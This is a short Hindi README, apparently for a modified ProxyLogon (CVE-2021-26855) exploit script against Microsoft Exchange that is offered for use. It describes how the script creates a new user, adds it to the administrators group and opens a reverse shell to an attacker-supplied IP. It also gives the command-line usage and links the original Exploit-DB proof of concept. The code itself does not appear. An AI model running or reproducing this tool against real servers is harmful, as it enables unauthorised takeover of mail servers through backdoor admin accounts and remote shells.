
CVE-2021-26855 (ProxyLogon) के लिए शोषण जो Microsoft Exchange को लक्षित करता है। एक नया व्यवस्थापक उपयोगकर्ता बनाता है और पोस्ट-एक्सप्लॉइटेशन पहुंच के लिए एक रिवर्स शेल स्थापित करता है।
CVE-2021-26855
यह proxylogon के लिए POC का एक संशोधित संस्करण है। "whoami" चलाने के बजाय, यह एक नया उपयोगकर्ता बनाता है और उस उपयोगकर्ता को प्रशासक समूह में जोड़ता है और एक reverse shell बनाता है। मूल POC कोड यहाँ पाया जा सकता है: https://www.exploit-db.com/exploits/49663
उपयोग: python proxylogon.py <reverse_shell_ip>